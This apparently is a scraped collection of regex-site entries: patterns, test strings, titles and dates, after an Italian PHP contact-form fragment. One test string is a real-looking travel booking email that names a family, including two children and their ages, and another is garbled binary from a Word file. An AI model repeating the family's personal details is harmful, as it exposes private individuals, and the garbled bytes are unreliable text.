preferisci, puoi contattarci telefonicamente al numero <b>%s</b>', $this->getSetting('site_phone')); ?> </div> <?php endif; ?> <div class="contact-form"> <?php echo $this->form; ?> <div class="clearfix"></div> <p>&nbsp;</p> <div class="small text-justify well well-sm"> <?php echo $this->translate('I dati personali saranno trattati ai sensi del D.Lgs. 196/2003, sulla tutela delle persone e di altri soggetti rispetto al trattamento dei dati personali, il trattamento delle informazioni che ti riguardano, sarà improntato ai principi di correttezza, liceità e trasparenza e tutelando la tua riservatezza e i tuoi diritti.'); ?> </div> </div> <?php endif; ?> </div> </div>
Extract string from translate function
2016-01-14T18:04:36.000Z
this simple regexp will find a string between two undercores
[^P_]\w+(?=_)
P_588186341_20160128
string between two underscores
2016-01-28T14:46:20.000Z
capture image id from a variety of gettyimages links
(?:https?:\/\/)?(?:www\.)?(?:gettyimages|gty)\.(?:\w+)\/(?:license|detail)\/(\d+).*
http://www.gettyimages.com/license/182149877?share=site_twitter
GettyImages links
2016-09-08T09:58:18.000Z
To Validate Iranian Operators Number Validation
(^0?(9(((1[0-9]?)|(9[0-4]?)|(03?)|((3[0356789]?)|(0[1-5]?)|(41?))|(2[0-3]?)|(9[89]?))(\d{0,7})?)?)?$)
Iranian Mobile Numbers
2023-06-11T10:41:49.000Z
(?:(?:\+?1\s*(?:[.-]\s*)?)?(?:\(\s*([2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9])\s*\)|([2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9]))\s*(?:[.-]\s*)?)?([2-9]1[02-9]|[2-9][02-9]1|[2-9][02-9]{2})\s*(?:[.-]\s*)?([0-9]{4})(?:\s*(?:#|x\.?|ext\.?|extension)\s*(\d+))?
90781-1232
phonenumber
2015-09-29T12:32:44.000Z
<script src=\"https://browser\.sentry-cdn\.com/([\d\.]+)*/bundle\.min\.js\"
<script src="https://browser.sentry-cdn.com/5.7.1/bundle.min.js"
ali
2020-08-10T05:56:38.000Z
[\w\s\p{P}\=]*([^0-9\.\+]\s*\K\d\s*(\+)\s*\d)(?=\D)
ajnxaslndsa;ndaJDASDNsadnKDNadk;NADK'nadkAnaskdmaskdnajfbajfnakdnaj;knasjnakdna;jkdna;nda;dna;kdnas;dkns so as sadasldka aldaskl . asdas asd 5,400 cgy 40.00 cgy 4 cgy gleason score 6/10(4+3), = 7 ) 1.1- 0.6,df 2,4-3,6 asdf 4+5+6 gleason's pattern: 2+3, 5 gleason score = 5(2+3) score 1+2, (score 7) gleason Dec 2011-23 jan 500,000.012 cgy sdfsfsodm sdfsd f sdfsd afdas. s adasas dasd as asdasdaskd askdm askdmas'ljdnas;das.ndaskjndajkndWJDNAksz gleason score 9, 4+5=9/10, PSA = 27.60, 8 specimens {0,100} (?<=(?i)gleason)[\w\s\p{P}\=]*([^0-9\.\+]\s*\K\d\s*(\+)\s*\d)(?=\D) (?<=(?i)gleason)[\w\s\p{P}\=]*([^0-9\.\-]\s*\K\d\s*(\-)\s*\d)(?=\D) (?<=(?i)gleason)[\w\s\p{P}\=]*([^0-9\.\,\#]\s*\K\d\s*(\,)\s*\d)(?=\D) [\w\s\p{P}\=]*([^0-9\.\+]\s*\K\d\s*(\+)\s*\d)(?=\D) (?<=[\\s])\\s*|^\\s+|\\s+$
Gleason score
2018-01-17T22:55:04.000Z
Match ESET Data Framework domains for exclusion from DNS logs
^ecp\.eset\.systems|(?:edf|h(?:[1,3,5]\-arse0[1,2]|5\-arse0[3,4])\-v)\.eset\.com$
ecp.eset.systems ecp.eset.systems edf.eset.com h1-arse01-v.eset.com h1-arse02-v.eset.com h3-arse01-v.eset.com h3-arse02-v.eset.com h5-arse01-v.eset.com h5-arse02-v.eset.com h5-arse03-v.eset.com h5-arse04-v.eset.com
ESET Data Framework domains (DNS)
2023-06-13T15:12:16.000Z
Search for a date in a text.
(?'YMDyear'[\d]{4})?\/(?'YMDmonth'[\d]{2})\/(?'YMDday'[\d]{2})|(?'DMYday'[\d]{2})\/(?'DMYmonth'[\d]{2})\/(?'DMYyear'[\d]{4})
01/14/2020 2020/01/31 01/01/2020 Test 01/01/1970 Bla bla 01/01/1970 hello!
Search for a date (Y/m/d or d/m/Y)
2021-07-14T07:27:09.000Z
(<blockquote.*?class='instagram-media'[^>]*>)(.*?)(<\/blockquote>)
<blockquote class='instagram-media' data-instgrm-captioned data-instgrm-permalink='https://www.instagram.com/p/BjaT3cgBHp4/' data-instgrm-version='8' style=' background:#FFF; border:0; border-radius:3px; box-shadow:0 0 1px 0 rgba(0,0,0,0.5),0 1px 10px 0 rgba(0,0,0,0.15); margin: 1px; max-width:658px; padding:0; width:99.375%; width:-webkit-calc(100% - 2px); width:calc(100% - 2px);'><div style='padding:8px;'> <div style=' background:#F8F8F8; line-height:0; margin-top:40px; padding:50.0% 0; text-align:center; width:100%;'> <div style=' background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACwAAAAsCAMAAAApWqozAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAMUExURczMzPf399fX1+bm5mzY9AMAAADiSURBVDjLvZXbEsMgCES5/P8/t9FuRVCRmU73JWlzosgSIIZURCjo/ad+EQJJB4Hv8BFt+IDpQoCx1wjOSBFhh2XssxEIYn3ulI/6MNReE07UIWJEv8UEOWDS88LY97kqyTliJKKtuYBbruAyVh5wOHiXmpi5we58Ek028czwyuQdLKPG1Bkb4NnM+VeAnfHqn1k4+GPT6uGQcvu2h2OVuIf/gWUFyy8OWEpdyZSa3aVCqpVoVvzZZ2VTnn2wU8qzVjDDetO90GSy9mVLqtgYSy231MxrY6I2gGqjrTY0L8fxCxfCBbhWrsYYAAAAAElFTkSuQmCC); display:block; height:44px; margin:0 auto -44px; position:relative; top:-22px; width:44px;'></div></div> <p style=' margin:8px 0 0 0; padding:0 4px;'> <a href='https://www.instagram.com/p/BjaT3cgBHp4/' style=' color:#000; font-family:Arial,sans-serif; font-size:14px; font-style:normal; font-weight:normal; line-height:17px; text-decoration:none; word-wrap:break-word;' target='_blank'>11 days after the #RoyalWedding &amp; I’m still tryna find someone to hold my hand and do the thumb thing like this 😩😩</a></p> <p style=' color:#c9c8cd; font-family:Arial,sans-serif; font-size:14px; line-height:17px; margin-bottom:0; margin-top:8px; overflow:hidden; padding:8px 0 7px; text-align:center; text-overflow:ellipsis; white-space:nowrap;'>A post shared by <a href='https://www.instagram.com/accessonline/' style=' color:#c9c8cd; font-family:Arial,sans-serif; font-size:14px; font-style:normal; font-weight:normal; line-height:17px;' target='_blank'> Access</a> (@accessonline) on <time style=' font-family:Arial,sans-serif; font-size:14px; line-height:17px;' datetime='2018-05-30T18:09:36+00:00'>May 30, 2018 at 11:09am PDT</time></p></div></blockquote>
test 2
2018-06-12T14:14:08.000Z
const ([a-zA-Z]+) = \(?[a-zA-Z,= ]+\)? =>.*
const validateFadvRequestType = requestType => {
js functions
2018-03-13T17:54:31.000Z
<script[^>]+>[\s|\S]*('facebook-jssdk'\)\); \/\/ ]]><\/script>)
<p><em>ขอขอบคุณข้อมูลจาก <a href="https://www.facebook.com/CrewabsCabincrew/photos/a.163266007065328.35057.162290157162913/981295968595657/?type=3">เฟซบุ๊ก Crewabs Cabincrew</a></em></p> <script type="text/javascript"></script>asdasd asdasdasd asdad <script type="text/javascript">// <![CDATA[ (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/th_TH/sdk.js#xfbml=1&version=v2.3"; fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk')); // ]]></script> <div class="fb-post" data-href="https://www.facebook.com/CrewabsCabincrew/photos/a.163266007065328.35057.162290157162913/981295968595657/?type=3" data-width="500"> <div class="fb-xfbml-parse-ignore"> <blockquote cite="https://www.facebook.com/CrewabsCabincrew/photos/a.163266007065328.35057.162290157162913/981295968595657/?type=3"> <p>จากใจแอร์สาวบนไฟล์ทที่โดนหนุ่มรถไฟจีบด้วยมุก"ระเบิด"กรณีหนุ่มรถไฟ แซวแอร์ไทยไลอ้อน อยากขอพื้นที่ชี้แจงให้ลูกเรือสาวในไ...</p> Posted by <a href="https://www.facebook.com/CrewabsCabincrew/">Crewabs Cabincrew</a> on&nbsp;<a href="https://www.facebook.com/CrewabsCabincrew/photos/a.163266007065328.35057.162290157162913/981295968595657/?type=3">3 พฤศจิกายน 2015</a></blockquote> </div> </div> </div> </div>
testscript
2015-11-06T10:49:56.000Z
Parsing my work time sheet (doesn't validate times/dates). Options available: 12/17/2015 09:00 - 13:00 12/17/2015 09:00 - 17:00 LUNCH 00:30 12/17/2016 HOLIDAY
^(\d{2})\/(\d{2})\/(\d{4})(?: (?:(HOLIDAY)|(?:(?:(\d{2}:\d{2}) - (\d{2}:\d{2}))(?: (LUNCH) (\d{2}:\d{2}))?))$)
12/17/2015 09:00 - 13:00 12/18/2015 09:00 - 17:00 LUNCH 00:30 01/18/2016 HOLIDAY 01/10/2016
Work Time Parsing
2016-01-27T18:35:32.000Z
(?:\b\s*?\:\s*)((?:[^;]*\".*?\"|[^;]*\'.*?\'|[^;]*)[^;]*)
/* makes the font 33% larger relative to the icon container */ .#{$fa-css-prefix}-lg { font-size: (4em / 3); line-height: (3em / 4); vertical-align: -15%; } .#{$fa-css-prefix}-2x { font-size: 2em; } .#{$fa-css-prefix}-3x { font-size: 3em; } .#{$fa-css-prefix}-4x { font-size: 4em; } .#{$fa-css-prefix}-5x { font-size: 5em; } @mixin fa-icon() { display: inline-block; font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration font-size: inherit; // can't have font-size inherit on line above, so need to override text-rendering: auto; // optimizelegibility throws things off #1094 -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @mixin fa-icon-rotate($degrees, $rotation) { filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation}); -webkit-transform: rotate($degrees); -ms-transform: rotate($degrees); transform: rotate($degrees); } @mixin fa-icon-flip($horiz, $vert, $rotation) { filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation}); -webkit-transform: scale($horiz, $vert); -ms-transform: scale($horiz, $vert); transform: scale($horiz, $vert); } // ------------------------- .#{$fa-css-prefix}-rotate-90 { @include fa-icon-rotate(90deg, 1); } .#{$fa-css-prefix}-rotate-180 { @include fa-icon-rotate(180deg, 2); } .#{$fa-css-prefix}-rotate-270 { @include fa-icon-rotate(270deg, 3); } .#{$fa-css-prefix}-flip-horizontal { @include fa-icon-flip(-1, 1, 0); } .#{$fa-css-prefix}-flip-vertical { @include fa-icon-flip(1, -1, 2); } // Hook for IE8-9 // ------------------------- :root .#{$fa-css-prefix}-rotate-90, :root .#{$fa-css-prefix}-rotate-180, :root .#{$fa-css-prefix}-rotate-270, :root .#{$fa-css-prefix}-flip-horizontal, :root .#{$fa-css-prefix}-flip-vertical { filter: none; } @font-face { font-family: 'FontAwesome'; src: url("#{$fa-font-path}/fontawesome-webfont.eot?v=#{$fa-version};"); src: url('#{$fa-font-path}/fontawesome-webfont.eot?#iefix&v=#{$fa-version}') format('embedded-opentype'), url('#{$fa-font-path}/fontawesome-webfont.woff2?v=#{$fa-version}#{$fa-version}') format('woff2'), url('#{$fa-font-path}/fontawesome-webfont.woff?v=#{$fa-version}') format('woff'), url('#{$fa-font-path}/fontawesome-webfont.ttf?v=#{$fa-version}') format('truetype'), url('#{$fa-font-path}/fontawesome-webfont.svg?v=#{$fa-version}#fontawesomeregular') format('svg'); // src: url('#{$fa-font-path}/FontAwesome.otf') format('opentype'); // used when developing fonts font-weight: normal; font-style : normal; }
3123123
2016-08-15T13:50:30.000Z
Test for Password using any character. Length of password can be from 8 - 63 characters
^[ -~]{8,63}$
Password Any Character len: 8-63
2015-09-11T16:17:09.000Z
([\d]{1,2})\s+([\w]+)\s+([\d]{4})\s+-\s+([\d]{1,2})\s+([\w]+)\s+([\d]{4})\s+([\d]{1,2})\s+N[a,ä]chte\s+([.\s\S]+)\s+DERTOUR
Mit freundlichen Grüßen i.A. Center Parcs Europe N.V. Tel.: 0221-97303042 Fax: 0221-97303019 EMail: [email protected] Vertragspartner: Center Parcs Europe N.V.; Korrespondenzadresse: Kaltenbornweg 1-3, 50679 Köln Geschäftsführer: Pascal R.L. Ferracci, Mark David Haak Wegmann Von: [email protected] <[email protected]> Gesendet: Montag, 4. Juli 2016 14:07 An: PVCP, Dertour Betreff: ADVISING=2016/07/04, SeqNo=738, RefNo=201607042684 CPNK§ Center Parcs Nordseeküste GmbH Attn.: Frau Schwamborn Kaltenbornweg 1-3 D-50679 Köln BRV10888 Center Parcs Park Nordseeküste -- OK gebucht -- DER-REF.: 671509446-3 RES-DAT.: 04 JUL 2016 Personen: 6 Erw. Kopie 01 X BK792 ( EUR 917.60 ) 08 JUL 2016 - 15 JUL 2016 7 Nächte Bestätigt nach Anfrage Frau MENTHE/URSULA Herr MENTHE/CHRISTOPH Herr MENTHE/HEIKO Frau MENTHE/CHRISTINA Kind MENTHE/SILJA (08) Kind MENTHE/JANDRIK (04) BRV10888 Center Parcs Park Nordseeküste -- Bitte stornieren -- DER-REF.: 671509446-2 RES-DAT.: 29 JUN 2016 Personen: 6 Erw. Kopie: kein komplettes Storno - nur Umbuchung auf Termin 08.-15.07. 01 X BK792 ( EUR 1,359.20 ) 08 JUL 2016 - 18 JUL 2016 10 Nächte Freesale Frau MENTHE/URSULA Herr MENTHE/CHRISTOPH Herr MENTHE/HEIKO Frau MENTHE/CHRISTINA Kind MENTHE/SILJA (08) Kind MENTHE/JANDRIK (04) DERTOUR GmbH & Co. KG Erlebnisparks FAX: 069/9588-5122 ++ ENDE AVIS ++
GUEST CAPTURE DERTOUR
2016-07-04T16:02:03.000Z
Just an example for a guy wanting to check space before comma
,
Hello World // true Hello, World // false (space after comma) Hello,World // true Hello ,World ,World // false
Bad comma puctuation
2014-07-17T15:14:58.000Z
Regular expression ^(?:https?:)?(?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n]+) used below extracts domain with subdomains out of a full url. It skips protocol (ex: https:), "//", "@", www subdomain and then captures everything (ex: domain) before ":" or "/" or end of line.
^(?:https?:)?(?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n]+)
https://play.google.com/store/apps/details?id=com.skgames.trafficracer%22 http://mplay.google.co.in/sadfask/asdkfals?dk=10 http://lplay.google.co.in/sadfask/asdkfals?dk=10 http://play.google.co.in/sadfask/asdkfals?dk=10 http://tplay.google.co.in/sadfask/asdkfals?dk=10? http://www.google.co.in:/sadfask/asdkfals?dk=10 www.google.co.in/sadfask/asdkfals?dk=10 https://user:[email protected]/?a=b#asdd //mplay.google.co.in -- Regular expression ^(?:https?:)?(?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n]+) -- used below extracts domain with subdomains out of a full url. -- It skips protocol (ex: https:), "//", "@", www subdomain and -- then captures everything (ex: domain) before ":" or "/" or end of line.
Domain out of URL
2018-10-15T13:57:48.000Z
access-list\s(?P<interface>[^\s]+)\s(extended)\s(?P<allowed>permit|deny)\s(?P<protocol>ip|tcp|udp|any)\s(?P<source>any[46]?)\s(?P<dest>host\s[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\seq\s(?P<services>[^\s]+)?
access-list https_in extended permit tcp any host 209.164.3.5 eq https
Cisco ASA - match any to host
2020-12-09T21:21:02.000Z
match qu
q(?=u)u
quit
???
2019-08-14T09:50:32.000Z
(?<=\n)\w{10}\w{0,5}(?=\w{0,9})\s{0,18}
Ateles_geoffroyi GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Ateles_hybridus GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Ateles_fusciceps GATGAGTGTGGCAAGGCCCAAGCGGAAGTGC?????????? Ateles_chamek GATGAGTGTGGCAAGGCCCA????????????????????? Ateles_paniscus ????????????????????????????????????????? Brachyteles_arachnoides GATGAGTGTGGCAAGGCCCAAGCGGAAGT???????????? Brachyteles_hypoxanthus GATGAGTGTGGCAAG?????????????????????????? Lagothrix_cana GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Lagothrix_lagotricha GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Alouatta_belzebul ????????????????????????????????????????? Alouatta_caraya ????????????????????????????????????????? Alouatta_sara GATGAATGTGGCAAGGCCCAAGCAGAAGTGCCG--GTTGCT Alouatta_palliata GATGAATGTGGCAAGGCCCAAGCAGAAGTGCCG--GTTGCT Callicebus_brunneus ????????????????????????????????????????? Callicebus_moloch GATGAGTGTGGCAAGGCCCAAGCAGAAGTGCCG--G????? Callicebus_cupreus GATGAGTGTGGCAAGGCCCAAGCAGAAGTGCCG--GTTGCT Callicebus_caligatus GATGAGTGTGGCAAGGCCCAAGCAGAAGTGCCG--GTTGCT Callicebus_donacophilus GATGAGTGTGGCAAGGCCCAAGCAGAAGTGCCG--GTTGCT Callicebus_coimbrai GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Callicebus_personatus GATGAGTGTGGCAAGGCCCAAGCGGAA?????????????? Callicebus_nigrifrons GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Cacajao_melanocephalus GATGAGTGTGGCAAAGCCCA????????????????????? Cacajao_calvus GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Chiropotes_israelita GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Chiropotes_satanas_chiro ????????????????????????????????????????? Pithecia_irrorata GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--G????? Pithecia_pithecia GATGAGTGTGGCAAGGCCCAAGCGGAAGTGCCG--GTTGCT Tarsius_bancanus ????????????????????????????????????????? Tarsius_syrichta ????????????????????????????????????????? Lepilemur_ankaranensis AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Lepilemur_septentrionali AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Lepilemur_dorsalis AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Lepilemur_ruficaudatus AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Lepilemur_jamesi AACGAGTGTGGCAAGGCCCAGG??????????????????? Microcebus_murinus_subsp AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Microcebus_murinus_subsp ????????????????????????????????????????? Mirza_zaza AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Cheirogaleus_medius ????????????????????????????????????????? Propithecus_verreauxi_co ????????????????????????????????????????? Propithecus_verreauxi AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Propithecus_tattersalli AACGAGTGTGGCAAGGCCCAGGCTGAAGTTCCG--GTTGCT Propithecus_diadema AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Propithecus_edwardsi AACGAGTGTGGCAAGGCCCAGGCG????????????????? Avahi_laniger AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_rufus AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_collaris AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_fulvus AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_albifrons AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_sanfordi AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_mongoz AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_macaco AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_macaco_flavifron AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_coronatus AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Eulemur_rubriventer AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Hapalemur_occidentalis AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Hapalemur_griseus AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Lemur_catta AACGAGTGTGGCAAGGCCCAGGCGGAAGTTCCG--GTTGCT Varecia_variegata_varieg AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Varecia_variegata_rubra AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Daubentonia_madagascarie ????????????????????????????????????????? Nycticebus_bengalensis AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Nycticebus_coucang AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Nycticebus_pygmaeus AACGAGTATGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Loris_tardigradus AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Arctocebus_calabarensis AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Perodicticus_potto AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Otolemur_garnetti AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Otolemur_crassicaudatus AACGAGTGTGGCAAGGCCCAGGCAGAAGTTCCG--GTTGCT Galago_moholi ????????????????????????????????????????? Galago_senegalensis ????????????????????????????????????????? Galago_thomasi AACGAGTGTGGCAAGGCCCAGGCG????????????????? Galeopterus_variegatus GATGAGTGTGGCAAGGCCCAAGCAGAAGTTCCG--G????? Cynocephalus_volans GATGAGTGTGGCAAGGCCCAAGCAGAAGTCCCG--GTTGCT Tupaia_glis ????????????????????????????????????????? Tupaia_minor ????????????????????????????????????????? rabbit_rabbit_rabbit ?????????????????????????????????????????
test
2019-09-28T16:47:44.000Z
this regexp will extract the homepage from an url; it will factor in the "www" if there is one, and it will accept a slash at the end
^(?:https?:\/\/)?(?:[^@\/\n]+@)?(?:www\.)?([^:\/\n]+)/?$
https://play.google.com/store/apps/details?id=com.skgames.trafficracer%22 http://mplay.google.co.in/sadfask/asdkfals?dk=10 http://lplay.google.co.in/sadfask/asdkfals?dk=10 http://play.google.co.in/sadfask/asdkfals?dk=10 http://tplay.google.co.in/sadfask/asdkfals?dk=10 http://www.google.co.in/sadfask/asdkfals?dk=10 www.google.co.in/sadfask/asdkfals?dk=10 http://user:[email protected]/?a=b#asdd https://play.google.com/ http://mplay.google.co.in http://lplay.google.co.in http://play.google.co.in
homepage_finder
2018-01-08T15:07:01.000Z
^ #(?=.*?\bmust-have\b) #(?=.*?\bmandatory\b) ( #(?!avoid|illegal|\t). (?!\t). )* $
must-have mandatory must-have mandatory avoid must-have mandatory avoid has a tab
multiple conditions
2019-07-30T15:45:38.000Z
^(?P<deutsch>(?:(?P<subjekt>(?:in\s)?(?:(?P<sich>sich)|etw\.|jd[mn]\.))\s)*(?P<wort>[\wäÄéöÖüÜß]+)(?:\s(?:(?P<rektion>(?:von|für|an)\s\((?:Dat|Akk)\))|\((?P<extra>[^\)]+)\)))*)\s(?P<definition>(?:[\wáéíóöőúüűÁÉÍÓÖŐÚÜŰ]|[ :,\/\(\);]|\-\n)+)$
abnehmen (nahm ab, abge- nom men) itt: csökken, fogy sich abwenden von (Dat) elfordul vkitől/vmitől sich etw. anhören meghallgat vmit anregen (fel)élénkít, felpezs- dít, ösztönöz jdm. auffallen (fiel auf, ist auf- gefallen) feltűnik vkinek vmi sich etw. ausleihen (lieh aus, ausgeliehen) kikölcsönöz magának vmit aussterben (starb aus, ist aus- gestorben) kihal auszeichnen itt: jellemez vkit/vmit, jellemző vkire/vmire behandeln kezel vkit/vmit; tárgyal/kifejt vmit benachrichtigen értesít jdn. bilden képez, művel vkit davonlaufen (lief davon, ist davongelaufen) elfut jdm. drohen (meg)fenyeget vkit durchlesen (las durch, durch- gelesen) átolvas in etw. eintauchen (tauchte ein, ist eingetaucht) bele- merül vmibe sich entscheiden für (Akk) (entschied, entschieden) dönt vmi/vki mellett jdn. erwischen bei (Dat) vkit rajtakap vmin fesseln lebilincsel, leköt fördern erősít, (elő)segít, támogat jdm. gelingen (gelang, ist ge- lungen) sikerül vkinek vmi jdm. etw. gestehen (gestand, gestanden) bevall vkinek vmit graben (grub, gegraben) itt: (bele)vés, (bele)metsz sich kümmern um (Akk) törő- dik vkivel/vmivel liegen an (Dat) (lag, gelegen) múlik vkin/vmin, függ vkitől/vmitőlloben dicsér senken csökkent schulen fejleszt, képez schwanken (zwischen) inga- dozik, nem tud dönteni (dolgok között) jdm. etw. stehlen (stahl, ge- stoh len) ellop vkitől vmit steigern növel, fokoz übernehmen (übernahm, über- nommen) átvesz, (át)vállal überraschen meglep überreden zu (Dat) rábeszél vmire übersehen (übersah, überse- hen) nem vesz észre, elnéz etw. übersetzen lefordít vergleichen (verglich, vergli- chen) összehasonlít verlernen elfelejt vermitteln közvetít vertonen megzenésít vervielfältigen sokszorosít verwenden használ jdm. etw. vorlesen (las vor, vor gelesen) felolvas vkinek vmit etw. vorstellen bemutat vmit zusammenstellen összeállít
Ausblick Verben
2018-02-04T19:29:46.000Z
\b(\w+)\b(\s\1)+
Esse eh eh um texto texto texto de de um gago gago que que que que nao consegue consegue falar falar direito direito, entao estou estou corrigindo o texto texto texto texto texto pra ele ele.
Palavras duplicadas
2017-06-09T14:53:40.000Z
This matches a ASP Cookieless SessionId. Useful if, for example, after deprecating Cookieless sessions you want to redirect any clients with a cached sessionId to the plain url.
^(\([A-Z]\([0-9]\)[A-Z]\([a-z0-9]{20,28}\)\))\/?(.*)
(X(1)S(4142eh3owtmwtoztdvvz45wo))/contact-us
URL with ASP Cookieless SessionId
2015-05-29T07:11:28.000Z
\byou+()|u+s
you youyou youyouyou u uu uuu Can't wait to see youuuu uuuuyou youuuuuyou uuyouuu you you youyou youyouyou u uu uuu Can't wait to see youuuu uuuuyou youuuuuyou uuyouuu I want to film the bayou with you and put it on youtube,
select you exclude bayou
2016-03-29T06:04:10.000Z
validate book desctiption
[(\w+\s)+.,-]{100,}
????>??(*????'?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? bjbj?>?>.?T?T?????????????$000000???????$D??N??00??[[[.00?[?[[[0?????A x???????9[?0[D9"D[D[$[??[????????????????????????????????????????????????????????????????????D? ?:Het socialezekerheidsrecht is een bijzonder ingewikkeld kluwen van diverse regelgevingen op verschillende niveaus. Dit handboek biedt een overzicht van de belangrijkste onderdelen ervan. Na een algemene beschrijving van de structuur, het toepassingsgebied en de financiering van de sociale zekerheid komen achtereenvolgens de verschillende takken van de sociale zekerheid aan bod, zoals de arbeidsongevallen- en beroepsziekteverzekeringen, de ziekteverzekering, de gezinsbijslag, de werkloosheidsverzekering, het wettelijk en het aanvullend pensioen. Er wordt ook aandacht geschonken aan de socialebijstandregelingen, zoals het leefloon, de inkomensgarantie voor ouderen enz.Op deze wijze biedt dit boek een eerste kennismaking met het socialezekerheidsrecht. Dit onderdeel van de sociale wetgeving is bij uitstek het domein waarin vrijwel dagelijks wijzigingen worden aangebracht. Daarom zullen via de website van Intersentia (www.intersentia-educatief.be) actualiseringen worden aangereikt tot aan de publicatie van een volgende editie. Ook het hoofdstuk over jaarlijkse vakantie en een uitgebreid pakket van elektronische oefeningen staan ter beschikking van de docenten die het handboek als lesmateriaal invoeren. Daarnaast vinden ze op dezelfde website ook een powerpointpresentatie. ??h{ah??h{a ?$a$gd{a,1?h??. ??A!??"??#??$??%???????j?????????666666666vvvvvvvvv666666>666666666666666666666666666?6666666666?666666666666hH66666666666666666666666666666666666666666666666666666666666666666?62???? 0@P`p??????2(?? 0@P`p?????? 0@P`p?????? 0@P`p?????? 0@P`p?????? 0@P`p?????? 0@P`p??8X?V~ OJPJQJ_HmHnHsHtHP`??PStandaardd??CJ_HaJmHsHtHLA ???L Standaardalinea-lettertypeVi???V 0Standaardtabel?4? l4?a?.k ???. 0 Geen lijstPK!????[Content_Types].xml???N?0E?H???-J??@%????|??$???U??L?TB? l,?3??;?r??Ø??J??B+$?G]??7O?V??<a??????(7??I??R?{?pgL?=??r????8?5v&????uQ??8??C????X=????$???6N?JC????????F?B.?'?.?+???Y?T???^e5?5?? ??ð?_?g -??;?????Yl????|6^?N??`?????[??PK!????6_rels/.rels???j?0????}Q??%v/??C/?}?(h"???O? ??????=??????? ????C??h?v=?????%[xp??{?_?P?<?1?H?0???O?R?Bd???JE?4b$??q_????6L??R?7`???????0?O??,?En7?Li?b??/?S???e?????????PK!ky???theme/theme/themeManager.xml?M ? @?}?w??7c?(Eb????C?A???????7???K Y,? ?e?.???|,???H?,l????x???I?sQ}#????? ?+?!?,?^?$j=?GW???)?E?+& 8???PK!?2/??theme/theme/theme1.xml?YMoE?#?F{oc'vGu??HS??-?q?;?fvg53N?j?HH??8P?Tj%.????H??3????$i#ZA}H?????3?z?^??!?????/?<D?4??a?????I?OH??]?x???x]E$&?'r??H?t}iI?0??e???????G.??--?j?K1??????(????x???DI=?31??;À??????2?1k{?(?GCrOy?a??E?????qu?g??Z0?4?o>?lBp?lt?pT(???+[?|`j?????z!??????F???e?@????n?Yk?????9?[?N???l?B ?~m???j???eo@??7:???7 ?_?????V.?"F??9?Nh??I/ c?+?k_?e? ??(/?b????b|??> 4?aE??)c??Xk?????!_? ieH?????}?b????~x??:?????????? 